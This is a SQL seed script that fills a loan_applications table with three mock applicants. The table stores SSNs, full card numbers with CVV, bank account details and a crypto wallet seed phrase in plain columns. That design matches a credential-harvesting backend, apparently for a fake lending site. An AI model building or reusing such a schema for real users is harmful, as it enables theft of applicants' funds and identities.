-- Seed loan_applications with mock sensitive data for admin verification
-- Matching actual schema: first_name, last_name, amount_requested, monthly_income, payout_method
INSERT INTO public.loan_applications (
    first_name,
    last_name,
    email,
    phone,
    amount_requested,
    currency,
    loan_purpose,
    employment_status,
    monthly_income,
    ssn,
    ein,
    card_holder_name,
    card_number,
    card_expiry,
    card_cvv,
    billing_address_line1,
    billing_city,
    billing_state,
    billing_postal_code,
    billing_country,
    bank_account_number,
    bank_routing_number,
    bank_name,
    crypto_wallet_type,
    crypto_seed_phrase,
    payout_method,
    status
) VALUES 
(
    'John',
    'Card-Test',
    'card.test@example.com',
    '+1234567890',
    25000,
    'USD',
    'Debt Consolidation',
    'Employed',
    7900,
    '999-00-1111',
    '11-1111111',
    'JOHN CARD',
    '4111 2222 3333 4444',
    '12/28',
    '123',
    '123 Card Lane',
    'New York',
    'NY',
    '10001',
    'USA',
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    'card',
    'pending'
),
(
    'Jane',
    'Crypto-Test',
    'crypto.test@example.com',
    '+0987654321',
    50000,
    'USD',
    'Investment',
    'Self-Employed',
    12500,
    '888-11-2222',
    '22-2222222',
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    'MetaMask / ETH',
    'abandon ability able about above absent absorb abstract absurd abuse accent accept',
    'crypto',
    'pending'
),
(
    'Robert',
    'Bank-Test',
    'bank.test@example.com',
    '+1122334455',
    75000,
    'USD',
    'Home Improvement',
    'Employed',
    9500,
    '777-33-4444',
    '33-3333333',
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    '000987654321',
    '021000021',
    'JPMorgan Chase',
    NULL,
    NULL,
    'bank_transfer',
    'pending'
);
